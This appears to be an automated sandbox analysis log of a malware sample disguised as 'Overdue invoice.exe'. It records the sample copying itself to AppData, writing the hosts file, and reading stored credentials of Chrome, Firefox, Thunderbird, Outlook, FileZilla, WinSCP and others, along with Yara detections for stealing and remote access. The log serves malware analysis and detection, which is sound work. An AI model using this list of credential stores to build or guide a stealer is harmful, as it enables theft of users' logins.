                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe	Queries volume information: C:\Users\user\Desktop\Overdue invoice.exe	VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll	VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll	VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll	VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll	VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll	VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll	VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll	VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll	VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe	Queries volume information: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe	VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll	VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll	VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll	VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll	VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe	Queries volume information: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe	VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll	VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll	VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll	VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll	VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe	Queries volume information: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe	VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll	VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll	VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll	VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll	VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll	VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll	VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll	VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll	VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                    Lowering of HIPS / PFW / Operating System Security Settings

                    Source: C:\Users\user\Desktop\Overdue invoice.exe	File written: C:\Windows\System32\drivers\etc\hosts

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: 16.2.yqWDN.exe.3de2e78.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 19.0.yqWDN.exe.400000.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 19.0.yqWDN.exe.400000.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.yqWDN.exe.3de2e78.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.0.Overdue invoice.exe.400000.10.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.0.Overdue invoice.exe.400000.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.yqWDN.exe.3e72e78.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.0.Overdue invoice.exe.400000.12.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 19.2.yqWDN.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 19.0.yqWDN.exe.400000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.Overdue invoice.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 19.0.yqWDN.exe.400000.10.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.0.Overdue invoice.exe.400000.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 19.0.yqWDN.exe.400000.12.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Overdue invoice.exe.3ac2e78.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.0.Overdue invoice.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match; File source: 15.2.yqWDN.exe.3e72e78.2.unpack, type: UNPACKEDPE
Source: Yara match; File source: 15.2.yqWDN.exe.3d8e3f8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 16.2.yqWDN.exe.3cfe3f8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.Overdue invoice.exe.3ac2e78.4.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.Overdue invoice.exe.39de3f8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000013.00000000.366458580.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000007.00000002.519470076.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000007.00000000.294988702.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000007.00000000.295945880.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000013.00000000.366994504.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000007.00000000.295465407.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000007.00000000.294210578.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000F.00000002.378013888.0000000003CEF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000013.00000000.365073156.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000013.00000000.365965578.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000013.00000002.519516875.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.302129408.0000000003B92000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000010.00000002.373874318.0000000003C5F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.300706050.000000000393F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000013.00000002.522484179.0000000003041000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000007.00000002.521991645.0000000003401000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: Overdue invoice.exe PID: 6504, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: Overdue invoice.exe PID: 7140, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: yqWDN.exe PID: 5496, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: yqWDN.exe PID: 7048, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: yqWDN.exe PID: 5572, type: MEMORYSTR
Source: C:\Users\user\Desktop\Overdue invoice.exe; File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\Desktop\Overdue invoice.exe; File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\Desktop\Overdue invoice.exe; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Users\user\Desktop\Overdue invoice.exe; Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe; File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe; Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Users\user\Desktop\Overdue invoice.exe; Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe; Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe; File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe; File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: Yara match; File source: 00000013.00000002.522484179.0000000003041000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000007.00000002.521991645.0000000003401000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: Overdue invoice.exe PID: 7140, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: yqWDN.exe PID: 5572, type: MEMORYSTR

                    Remote Access Functionality

Source: Yara match; File source: 16.2.yqWDN.exe.3de2e78.2.unpack, type: UNPACKEDPE
Source: Yara match; File source: 19.0.yqWDN.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match; File source: 19.0.yqWDN.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match; File source: 16.2.yqWDN.exe.3de2e78.2.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 7.0.Overdue invoice.exe.400000.10.unpack, type: UNPACKEDPE
Source: Yara match; File source: 7.0.Overdue invoice.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match; File source: 15.2.yqWDN.exe.3e72e78.2.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 7.0.Overdue invoice.exe.400000.12.unpack, type: UNPACKEDPE
Source: Yara match; File source: 19.2.yqWDN.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 19.0.yqWDN.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match; File source: 7.2.Overdue invoice.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 19.0.yqWDN.exe.400000.10.unpack, type: UNPACKEDPE
Source: Yara match; File source: 7.0.Overdue invoice.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match; File source: 19.0.yqWDN.exe.400000.12.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.Overdue invoice.exe.3ac2e78.4.unpack, type: UNPACKEDPE
Source: Yara match; File source: 7.0.Overdue invoice.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match; File source: 15.2.yqWDN.exe.3e72e78.2.unpack, type: UNPACKEDPE
Source: Yara match; File source: 15.2.yqWDN.exe.3d8e3f8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 16.2.yqWDN.exe.3cfe3f8.3.raw.unpack, type: UNPACKEDPE
